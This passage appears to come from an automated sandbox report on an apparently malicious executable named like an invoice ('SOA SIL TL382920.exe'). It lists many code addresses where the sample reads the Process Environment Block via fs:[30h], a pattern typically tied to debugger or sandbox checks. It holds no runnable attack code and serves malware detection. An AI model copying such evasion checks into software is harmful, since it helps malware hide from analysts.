Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B273 mov eax, dword ptr fs:[00000030h]	2_2_0182B273
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B273 mov eax, dword ptr fs:[00000030h]	2_2_0182B273
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018ED270 mov eax, dword ptr fs:[00000030h]	2_2_018ED270
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE588 mov eax, dword ptr fs:[00000030h]	2_2_018AE588
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE588 mov eax, dword ptr fs:[00000030h]	2_2_018AE588
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF582 mov eax, dword ptr fs:[00000030h]	2_2_018EF582
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01862594 mov eax, dword ptr fs:[00000030h]	2_2_01862594
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018B85AA mov eax, dword ptr fs:[00000030h]	2_2_018B85AA
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018345B0 mov eax, dword ptr fs:[00000030h]	2_2_018345B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018345B0 mov eax, dword ptr fs:[00000030h]	2_2_018345B0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F5C7 mov eax, dword ptr fs:[00000030h]	2_2_0182F5C7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018665D0 mov eax, dword ptr fs:[00000030h]	2_2_018665D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0183B5E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BC5FC mov eax, dword ptr fs:[00000030h]	2_2_018BC5FC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B502 mov eax, dword ptr fs:[00000030h]	2_2_0182B502
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E507 mov eax, dword ptr fs:[00000030h]	2_2_0185E507
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01832500 mov eax, dword ptr fs:[00000030h]	2_2_01832500
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C50D mov eax, dword ptr fs:[00000030h]	2_2_0186C50D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186C50D mov eax, dword ptr fs:[00000030h]	2_2_0186C50D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01851514 mov eax, dword ptr fs:[00000030h]	2_2_01851514
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BC51D mov eax, dword ptr fs:[00000030h]	2_2_018BC51D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov ecx, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov ecx, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DF51B mov eax, dword ptr fs:[00000030h]	2_2_018DF51B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184252B mov eax, dword ptr fs:[00000030h]	2_2_0184252B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01833536 mov eax, dword ptr fs:[00000030h]	2_2_01833536
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01833536 mov eax, dword ptr fs:[00000030h]	2_2_01833536
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182753F mov eax, dword ptr fs:[00000030h]	2_2_0182753F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182753F mov eax, dword ptr fs:[00000030h]	2_2_0182753F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182753F mov eax, dword ptr fs:[00000030h]	2_2_0182753F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01872539 mov eax, dword ptr fs:[00000030h]	2_2_01872539
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184E547 mov eax, dword ptr fs:[00000030h]	2_2_0184E547
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01866540 mov eax, dword ptr fs:[00000030h]	2_2_01866540
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B55F mov eax, dword ptr fs:[00000030h]	2_2_0190B55F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B55F mov eax, dword ptr fs:[00000030h]	2_2_0190B55F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183254C mov eax, dword ptr fs:[00000030h]	2_2_0183254C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FA553 mov eax, dword ptr fs:[00000030h]	2_2_018FA553
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0184C560 mov eax, dword ptr fs:[00000030h]	2_2_0184C560
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01830485 mov ecx, dword ptr fs:[00000030h]	2_2_01830485
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186B490 mov eax, dword ptr fs:[00000030h]	2_2_0186B490
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186B490 mov eax, dword ptr fs:[00000030h]	2_2_0186B490
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BC490 mov eax, dword ptr fs:[00000030h]	2_2_018BC490
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018324A2 mov eax, dword ptr fs:[00000030h]	2_2_018324A2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018324A2 mov ecx, dword ptr fs:[00000030h]	2_2_018324A2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BD4A0 mov ecx, dword ptr fs:[00000030h]	2_2_018BD4A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BD4A0 mov eax, dword ptr fs:[00000030h]	2_2_018BD4A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BD4A0 mov eax, dword ptr fs:[00000030h]	2_2_018BD4A0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E4BC mov eax, dword ptr fs:[00000030h]	2_2_0186E4BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018514C9 mov eax, dword ptr fs:[00000030h]	2_2_018514C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018514C9 mov eax, dword ptr fs:[00000030h]	2_2_018514C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018514C9 mov eax, dword ptr fs:[00000030h]	2_2_018514C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018514C9 mov eax, dword ptr fs:[00000030h]	2_2_018514C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018514C9 mov eax, dword ptr fs:[00000030h]	2_2_018514C9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018544D1 mov eax, dword ptr fs:[00000030h]	2_2_018544D1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018544D1 mov eax, dword ptr fs:[00000030h]	2_2_018544D1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0185F4D0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E4EF mov eax, dword ptr fs:[00000030h]	2_2_0186E4EF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186E4EF mov eax, dword ptr fs:[00000030h]	2_2_0186E4EF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF4FD mov eax, dword ptr fs:[00000030h]	2_2_018EF4FD
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018364F0 mov eax, dword ptr fs:[00000030h]	2_2_018364F0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018594FA mov eax, dword ptr fs:[00000030h]	2_2_018594FA
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182640D mov eax, dword ptr fs:[00000030h]	2_2_0182640D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B420 mov eax, dword ptr fs:[00000030h]	2_2_0182B420
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01867425 mov eax, dword ptr fs:[00000030h]	2_2_01867425
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01867425 mov ecx, dword ptr fs:[00000030h]	2_2_01867425
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF42F mov eax, dword ptr fs:[00000030h]	2_2_018BF42F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF42F mov eax, dword ptr fs:[00000030h]	2_2_018BF42F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF42F mov eax, dword ptr fs:[00000030h]	2_2_018BF42F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF42F mov eax, dword ptr fs:[00000030h]	2_2_018BF42F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018BF42F mov eax, dword ptr fs:[00000030h]	2_2_018BF42F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01840445 mov eax, dword ptr fs:[00000030h]	2_2_01840445
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D454 mov eax, dword ptr fs:[00000030h]	2_2_0183D454
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E45E mov eax, dword ptr fs:[00000030h]	2_2_0185E45E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E45E mov eax, dword ptr fs:[00000030h]	2_2_0185E45E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E45E mov eax, dword ptr fs:[00000030h]	2_2_0185E45E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E45E mov eax, dword ptr fs:[00000030h]	2_2_0185E45E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E45E mov eax, dword ptr fs:[00000030h]	2_2_0185E45E
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FA464 mov eax, dword ptr fs:[00000030h]	2_2_018FA464
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01838470 mov eax, dword ptr fs:[00000030h]	2_2_01838470
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01838470 mov eax, dword ptr fs:[00000030h]	2_2_01838470
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF478 mov eax, dword ptr fs:[00000030h]	2_2_018EF478
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01861796 mov eax, dword ptr fs:[00000030h]	2_2_01861796
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01861796 mov eax, dword ptr fs:[00000030h]	2_2_01861796
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B781 mov eax, dword ptr fs:[00000030h]	2_2_0190B781
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0190B781 mov eax, dword ptr fs:[00000030h]	2_2_0190B781
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018AE79D mov eax, dword ptr fs:[00000030h]	2_2_018AE79D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018307A7 mov eax, dword ptr fs:[00000030h]	2_2_018307A7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_018FD7A7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_018FD7A7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018FD7A7 mov eax, dword ptr fs:[00000030h]	2_2_018FD7A7
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_019017BC mov eax, dword ptr fs:[00000030h]	2_2_019017BC
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF7CF mov eax, dword ptr fs:[00000030h]	2_2_018EF7CF
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185E7E0 mov eax, dword ptr fs:[00000030h]	2_2_0185E7E0
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018337E4 mov eax, dword ptr fs:[00000030h]	2_2_018337E4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018377F9 mov eax, dword ptr fs:[00000030h]	2_2_018377F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018377F9 mov eax, dword ptr fs:[00000030h]	2_2_018377F9
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183D700 mov ecx, dword ptr fs:[00000030h]	2_2_0183D700
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F970B mov eax, dword ptr fs:[00000030h]	2_2_018F970B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018F970B mov eax, dword ptr fs:[00000030h]	2_2_018F970B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B705 mov eax, dword ptr fs:[00000030h]	2_2_0182B705
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B705 mov eax, dword ptr fs:[00000030h]	2_2_0182B705
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B705 mov eax, dword ptr fs:[00000030h]	2_2_0182B705
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182B705 mov eax, dword ptr fs:[00000030h]	2_2_0182B705
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185270D mov eax, dword ptr fs:[00000030h]	2_2_0185270D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185270D mov eax, dword ptr fs:[00000030h]	2_2_0185270D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0185270D mov eax, dword ptr fs:[00000030h]	2_2_0185270D
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183471B mov eax, dword ptr fs:[00000030h]	2_2_0183471B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0183471B mov eax, dword ptr fs:[00000030h]	2_2_0183471B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018EF717 mov eax, dword ptr fs:[00000030h]	2_2_018EF717
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01833722 mov eax, dword ptr fs:[00000030h]	2_2_01833722
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01833722 mov eax, dword ptr fs:[00000030h]	2_2_01833722
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01859723 mov eax, dword ptr fs:[00000030h]	2_2_01859723
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0186174A mov eax, dword ptr fs:[00000030h]	2_2_0186174A
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov eax, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov eax, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov eax, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov ecx, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov eax, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01852755 mov eax, dword ptr fs:[00000030h]	2_2_01852755
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_0182F75B mov eax, dword ptr fs:[00000030h]	2_2_0182F75B
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018DE750 mov eax, dword ptr fs:[00000030h]	2_2_018DE750
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01842760 mov ecx, dword ptr fs:[00000030h]	2_2_01842760
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_01871763 mov eax, dword ptr fs:[00000030h]	2_2_01871763
